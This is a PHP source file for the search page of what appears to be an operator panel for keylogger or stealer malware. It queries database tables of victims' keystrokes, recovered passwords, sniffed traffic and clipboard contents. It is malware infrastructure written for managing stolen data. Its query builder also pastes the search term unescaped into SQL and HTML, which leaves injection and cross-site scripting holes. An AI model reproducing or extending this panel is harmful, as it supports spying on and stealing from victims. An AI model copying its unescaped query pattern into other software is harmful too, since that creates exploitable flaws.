<?php

function clearSearchSession()
{
    $_SESSION["searchQ"] = NULL; $_SESSION["searchIn"] = NULL;
}

function gotoSearch($fb)
{
    if( isset($_SESSION["pmSearch"]) && $_SESSION["pmSearch"] ) {
        $sr = $_SESSION["pmSearch"]; $_SESSION["pmSearch"] = NULL;
        doSearch($fb, $sr ); exit();
    }
        
    clearSearchSession();
    if( has_get("type") ) { $_SESSION["searchTable"] = get("type"); }
    doSearch($fb, $_SESSION["searchTable"] ); 
}

function doSearch($fb, $searchTable)
{
    if( !$searchTable ) { return; }
    
    require_once 'fb_Logs.php';
    getSearchPage_str($fb, $searchTable);
    $err = $fb->panel->str['err']['unerr'];
    $title = $fb->panel->str['pageHead']['search'];
    
    $html = searchFrom($fb, $searchTable);
    $searchQ = NULL; $searchIn = NULL;
    $p_str = $fb->panel->str;
    $misc = $fb->panel->str['misc'];
    
    $_SESSION["searchTable"] = $searchTable;
    $img = "<p>".$fb->panel->png[$searchTable]."</p>";
    $StartNum = ($searchTable == "logs")? 1 : 2;
    $tableHead = ($searchTable == "logs")? $p_str['logshead'] : $p_str['keyhead'];
    $html .=  ($searchTable == "logs")? $p_str['searchformlog'].$img : $p_str['searchkeys'].$img;
    
    if( has_post("q") && has_post("in") && is_numeric(post("in")) && post("in") > 0 && post("in") < 7) 
    {
        $searchQ = post("q"); $searchIn = post("in");
        $_SESSION["searchQ"] = $searchQ; $_SESSION["searchIn"] = $searchIn;
        $constructForm = $p_str['sformStart']." value='".$searchQ."' ".putSearchVal($searchIn, $StartNum); 
        $html = searchFrom($fb, $searchTable).$constructForm.$img;
    }
    elseif($_SESSION["searchQ"] != NULL && $_SESSION["searchIn"] != NULL)
    {
        $searchQ = $_SESSION["searchQ"]; $searchIn = $_SESSION["searchIn"];
        $constructForm = $p_str['sformStart']." value='".$searchQ."' ".putSearchVal($searchIn, $StartNum); 
        $html = searchFrom($fb, $searchTable).$constructForm.$img;
    }
    
    if($searchQ != NULL && $searchIn != NULL)
    {
        $result = mysqli_query($fb->mysql,"SELECT * FROM ".$searchTable." WHERE `".$p_str['Colum'][$searchIn]."` LIKE '%".$searchQ."%';");
        if (!$result) {
            show($p_str['bodyHeader'].$err.$fb->str['footer']."</div>", $err);
        }
     
        if( mysqli_num_rows($result) > 0) {
            $html .= $tableHead."<input type='hidden' name='act' value='SearchPage'/>";//Mark SearchPage.
            $html .= TableLogs($result, $searchTable);
					
            $html .= "</table><div id='pages'><div id='numbers'>" .mysqli_num_rows($result). 
            " ".$misc['resultfoundfor']." ".$searchQ." ".$misc['in']." ".$p_str['Opt'][$searchIn-1]." </div><div id='buttons'>"
            ."<input type='hidden' name='logtype' value='".$searchTable."'/>".$p_str['footBtn'];
        }
        else  {
            mysqli_close($fb->mysql);//Debuger Bug in SqliDriver not fixable..
            show($p_str['bodyHeader'].$html."<h3>".$fb->str['head_str']['noresult']."</h3>".$fb->str['footer']."</div>", $title);
        }
        mysqli_close($fb->mysql);//Debuger Bug in SqliDriver not fixable..
    } 
    else {
        show($p_str['bodyHeader'].$html.$fb->str['footer']."</div>", $title);
    }
    
    show($p_str['bodyHeader'].$html.$fb->str['footer']."</div>", $title);
}

function putSearchVal($val, $num)
{
    global $fb;
    $srchIn = "class='search-query' size='20'> ".$fb->panel->str['misc']['in'].": <select name='in'>";
    for($i = $num; $i < 7; $i++)
    {
        if($i == $val)
        {
            $srchIn .= "<option selected='selected' value='".$i."'>".$fb->panel->str['Opt'][$i-1]."</option>";
        }
        else {
            $srchIn .= "<option value='".$i."'>".$fb->panel->str['Opt'][$i-1]."</option>";
        }
    }
    return $srchIn."</select><input type='submit' name='search' value='".$fb->panel->str['pageHead']['search'].
            "' onclick='if (!qSearch()) return false;'></form>";
}

function searchFrom($fb, $searchTable)
{
    $src = $fb->panel->str['pageHead'];
    $search = $fb->panel->str['pageHead']['search'];
    $btn = array("logs","keystrokes","recoveries","sniffs","clipboard","junk");
    $redBtn = "<span class='btn' style='color:#996666'>";
    $sBtn = "<span class='well' style='color:#990012'>";
    $ls = "<td> <li><a href='?action=search&type=";
    $li = "</span></a></li> </td>";
    
    for ($i = 0; $i < count($btn); $i++)
    {
        if( $btn[$i] == $searchTable )
        {
            $btn[$i] = $sBtn;
        }else{ $btn[$i] = $redBtn; }
    }
    
    $html = "<ul class='nav nav-tabs'> <table style='width:100%;'> <tr>".
            $ls."logs'>".$btn[0].$search." ".$src['logs'].$li.
            $ls."keystrokes'>".$btn[1].$search." ".$src['keystrokes'].$li.
            $ls."recoveries'>".$btn[2].$search." ".$src['recoveries'].$li.
            $ls."sniffs'>".$btn[3].$search." ".$src['sniffs'].$li.
            $ls."clipboard'>".$btn[4].$search." ".$src['clipboard'].$li.
            $ls."junk'>".$btn[5].$search." ".$src['junk'].$li."</tr> </table> </ul>";
    return $html;
}